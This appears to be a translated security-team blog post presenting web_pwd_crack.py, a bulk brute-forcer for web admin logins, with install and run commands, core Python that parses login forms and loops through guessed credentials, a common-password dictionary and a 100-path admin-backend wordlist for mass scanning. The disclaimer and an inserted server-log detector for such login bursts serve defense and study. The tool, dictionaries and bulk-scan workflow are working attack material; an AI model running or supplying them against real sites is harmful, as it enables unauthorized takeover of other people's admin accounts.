Original | Sword Without Front | Tide Security Team
Statement
This article was first published in the FreeBuf Tidesec column by "Sword Without Front", a member of the Tide security team:
https://www.freebuf.com/sectool/200345.html
The technologies, ideas and tools involved in this article are for security learning and exchange only. Nobody may use them for illegal or profit-making purposes; anyone who does bears the consequences themselves!
Note: this script only explores the feasibility of cracking general web passwords. For all tests, build the target environment yourself, or test only after obtaining authorization from the owner of the target system.
Tool introduction
Sometimes at work we need to quickly test the security of the admin backends of many websites in bulk, especially for weak passwords. This kind of work is not difficult, but it is time-consuming and laborious, and it calls for an automated script. However, most current web password cracking tools are written for one particular CMS, or, like Burp Suite, must be configured by hand for each target; we had not seen a general-purpose cracking tool.
So we wrote this small tool, a general web weak password cracking script. Combined with another information collection tool, https://github.com/tidesec/fuzzscanner, it can scan targets in bulk.
Installation and use
Installation and use are relatively simple:
Clone it from GitHub
git clone https://github.com/TideSec/web_pwd_common_crack
Install the dependencies listed in requirements.txt
pip install -r requirements.txt
Then just run the script
python web_pwd_crack.py url.txt 50 --> url.txt is the list of URLs to scan, 50 is the number of threads (default 50)
url.txt holds the URLs to be tested. You can write a script to collect them from a search engine in bulk, or collect them with a directory enumeration tool.
How it works
1. Access the target address and analyze keywords
The principle is very crude: extract the forms from the page and search their contents. If fields such as username, password, user, pwd or pass are found, the page is treated as a login page. The form parameters are then extracted to build the POST data, which is handed to the crack function.
Because request packets differ so much between websites, it is currently not possible to extract every kind of login POST the way WVS does; the script relies on simple keyword matching only.
logins =['用户名','密码','login','denglu','登录','user','pass','yonghu','mima','pwd','zhanghao','yonghu','name','email','account']
Testing also showed that search boxes sometimes interfere with the result, so search forms are excluded as well
sous = ['检索','搜','search','查找','keyword','关键字']
In addition, automatic recognition of verification codes (captchas) is not supported yet, so forms with a verification code are also excluded
yzms = ['验证码','点击更换','点击刷新','checkcode','valicode','code','captcha']
2. Get the POST address and parameters by parsing the page
import re
import requests
from bs4 import BeautifulSoup as BS

# requests_headers(), requests_proxies(), get_error_length(), USERNAME_DIC and
# PASSWORD_DIC are defined elsewhere in web_pwd_crack.py.

def get_post_get_page(content, url):
    # content is the <form> fragment found by the keyword scan; its first line holds the opening tag
    form_action = str(content).split('\n')[0]
    soup = BS(form_action, "lxml")
    # Rebuild the directory part of the page URL so a relative action can be resolved
    url_path = ''
    for x in re.findall(".*?/", url):
        url_path = url_path + x
    action_url = soup.form['action']
    if str(action_url).startswith('http'):
        path = action_url
    else:
        path = url_path + soup.form['action']
    method = soup.form['method']
    return path, method


def web_crack(method, path, data):
    conn = requests.session()
    # The first GET primes the session with any cookies the login page sets
    res0 = conn.get(path, headers=requests_headers(), allow_redirects=False, timeout=10, proxies=requests_proxies())
    # Baseline for a known-wrong login: response length, whether it already sets a cookie,
    # and whether the length varies between identical requests (then it cannot be used)
    error_length, cookie_error_flag, dynamic_req_len = get_error_length(conn, method, path, data)
    if dynamic_req_len:
        return False, False
    num = 0
    success_flag = 0
    dic_all = len(USERNAME_DIC) * len(PASSWORD_DIC)
    for user_name in USERNAME_DIC:
        for pass_word in PASSWORD_DIC:
            data1 = data
            user_name = user_name.strip()
            pass_word = pass_word.strip()
            # '{user}' in the password dictionary stands for the current user name
            pass_word = str(pass_word.replace('{user}', user_name))
            # data carries the URL-encoded placeholders {user_name} and {pass_word}
            data2 = str(data1.replace('%7Buser_name%7D', user_name))
            data2 = str(data2.replace('%7Bpass_word%7D', pass_word))
            num = num + 1
            res = conn.post(url=path, data=data2, headers=requests_headers(), timeout=10, verify=False, allow_redirects=False, proxies=requests_proxies())
            cur_length = len(res.content) + len(str(res.headers))
            if cookie_error_flag:
                # The failed-login baseline already sets a cookie, so only a length change counts
                if cur_length != error_length:
                    success_flag = 1
                    return user_name, pass_word
            elif 'Set-Cookie' in res.headers and cur_length != error_length:
                success_flag = 1
                return user_name, pass_word
    if success_flag == 0:
        return False, False
3. A relatively simple dictionary is configured
USERNAME_DIC = ['admin','guest','test','ceshi','system']
PASSWORD_DIC = ['123456','admin','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2018','{user}2017','{user}2016','{user}2015','{user}!','P@ssw0rd!!','qwa123','12345678','test','[email protected]#','123456789','123321','1314520','666666','woaini','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','a123456','p@ssw0rd','a123456789','woaini1314','qwerasdf','123456a','123456789a','987654321','[email protected]#$','5201314520', 'q123456', '123456abc', '123123123', '123456.','0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX','12345','1234567','passw0rd','admin888']
4. How success is judged
At present, several methods are used that cross-check each other:
1. Whether the response contains a Set-Cookie header;
2. A change in the length of the response;
3. Re-verification using requests.session();
4. Content matching on the returned page.
5. Accuracy is improved by adding a re-check function
Testing showed false positives, so an account and password reported as successful are verified again. Examples of what causes them:
1. Some systems ban the IP after several probes, which interferes with the cracking script's judgment;
2. Some systems have no verification code at first, but show one after a few failures;
3. The prompt message on some systems changes randomly, causing false positives.
Working interface
The scanning process is as follows
The results of successful cracks are kept in the web_crack_ok.txt file
During the scan, all log entries such as verification-code and phpMyAdmin pages are saved in the web_crack_log.txt file, so you can screen them one by one afterwards according to the log.
Test conclusion
In fact, only after finishing this tool did I understand why there is no general-purpose cracker on the market: the success rate really is not high! I tested 10000 admin backends (all self-built!) and cracked about 110 weak passwords. I have not confirmed whether there are any false positives, but there were basically none.
The main reasons for the low success rate are:
1. Because web page types are so varied, it is difficult to obtain and submit the correct parameters;
2. Many pages have verification codes, which this little script cannot recognize automatically yet;
3. Some sites block the IP or lock the account when the access frequency is too high;
4. To balance time and efficiency, a relatively simple user name and password dictionary is used, so slightly more complex passwords cannot be cracked.
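Reasons 3 and 4 are the defender's side of the same picture: the script sends a few hundred POSTs to one login action from one source and decides success by a change in response length, so a web server log shows exactly that burst. The following detector is an added example, not part of web_pwd_crack.py; it assumes Apache/Nginx combined log format, uses path fragments from the dictionary below as login hints, and runs on constructed sample lines.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Path fragments from the admin-backend dictionary: POSTs to such paths count as login attempts.
LOGIN_RE = re.compile(r"login|logon|admin|denglu")
# Apache/Nginx combined log format (assumed); SAMPLE_LOG is constructed, not real traffic.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Apr/2019:10:00:02 +0800] "POST /admin/login.php HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Apr/2019:10:00:03 +0800] "POST /admin/login.php HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Apr/2019:10:00:04 +0800] "POST /admin/login.php HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Apr/2019:10:00:05 +0800] "POST /admin/login.php HTTP/1.1" 302 312',
    '10.0.0.5 - - [01/Apr/2019:10:00:06 +0800] "POST /admin/login.php HTTP/1.1" 302 312',
]

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    size = 0 if m["size"] == "-" else int(m["size"])
    return dict(m.groupdict(), ts=ts, status=int(m["status"]), size=size)

def detect_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {(ip, path): (peak_attempts, deviating)} for clients that POST to a
    login-like path more than `threshold` times inside a sliding `window`. `deviating`
    lists (status, size) of responses whose size differs from the burst's usual failure
    size: the length-change signal the script relies on, seen from the server side."""
    recent = defaultdict(deque)   # (ip, path) -> timestamps still inside the window
    seen = defaultdict(list)      # (ip, path) -> (status, size) of every attempt
    peak = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or not LOGIN_RE.search(rec["path"].lower()):
            continue
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > window:   # expire timestamps older than the window
            q.popleft()
        seen[key].append((rec["status"], rec["size"]))
        if len(q) > threshold:
            peak[key] = max(len(q), peak.get(key, 0))
    alerts = {}
    for key, n in peak.items():
        usual = Counter(size for _, size in seen[key]).most_common(1)[0][0]
        alerts[key] = (n, [r for r in seen[key] if r[1] != usual])
    return alerts
```

A deviating response inside a flagged burst is worth a manual look: it is either the guess that worked or the lockout/captcha page that stopped the script, and both deserve an alert.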
I usually use a directory enumeration tool such as dirsearch with a lighter admin-backend directory dictionary to scan the target addresses in bulk, and then use web_pwd_crack.py to crack these backend addresses in bulk.
As a contribution, here is a relatively compact admin-backend directory dictionary (100):
admin/default/login.asp
admin/login.asp
admin/manage/login.asp
admin_login/login.asp
admincp/login.asp
administrator/login.asp
login.asp
manage/login.asp
manager/login.asp
member/login.asp
admin-login.php
admin/admin-login.php
admin/admin_login.php
admin/login.php
admin2/login.php
admin_area/login.php
admin_login.php
adminarea/login.php
admincontrol/login.php
administrator/login.php
administratorlogin.php
adminlogin.php
autologin.php
bb-admin/login.php
blog/wp-login.php
checklogin.php
login.php
modelsearch/login.php
moderator/login.php
nsw/admin/login.php
pages/admin/admin-login.php
panel-administracion/login.php
processlogin.php
rcjakar/admin/login.php
relogin.php
siteadmin/login.php
sqlbuddy/login.php
userlogin.php
usuarios/login.php
webadmin/login.php
wp-login.php
account/login.jsp
accounts/login.jsp
admin/login.jsp
auth/login.jsp
jsp/extension/login.jsp
login.jsp
member/login.jsp
members/login.jsp
portalAppAdmin/login.jsp
admin.jsp
netadmin.jsp
admin.php
admin.php3
admin/admin.php
admin_area/admin.php
adminarea/admin.php
authadmin.php
bb-admin/admin.php
checkadmin.php
cmsadmin.php
dbadmin.php
fileadmin.php
isadmin.php
linusadmin-phpinfo.php
memberadmin.php
moadmin.php
modelsearch/admin.php
moderator/admin.php
panel-administracion/admin.php
phpliteadmin.php
siteadmin.php
sysadmin.php
tmp/admin.php
ur-admin.php
user/admin.php
users/admin.php
webadmin.php
webadmin/admin.php
wp-content/plugins/akismet/admin.php
admin.asp
admin.aspx
admin/default/admin.asp
admin/manage/admin.asp
admin_login/admin.asp
administrator/admin.asp
article/admin/admin.asp
denglu/admin.asp
guanli/admin.asp
houtai/admin.asp
login/admin/admin.asp
manage/admin.asp
manager/admin.asp
member/admin.asp
admin/logon.jsp
admin/secure/logon.jsp
compass/logon.jsp
logon.jsp
logon/logon.jsp
ToDo
1. Add verification code recognition
2. Reduce the false positive rate
3. Optimize web page encoding
4. Make the code less crude
The Tide security team was formally established in January 2019. It is a security team under the banner of New Information, dedicated to research on Internet attack and defense technology. It currently gathers more than ten professional security attack and defense researchers, focusing on network attack and defense, web security, mobile terminals, secure development, IoT / Internet of Things / industrial control security and other directions.
For more about the Tide security team, follow the team's official website, http://www.TideSec.net, or long-press the QR code to follow the official account: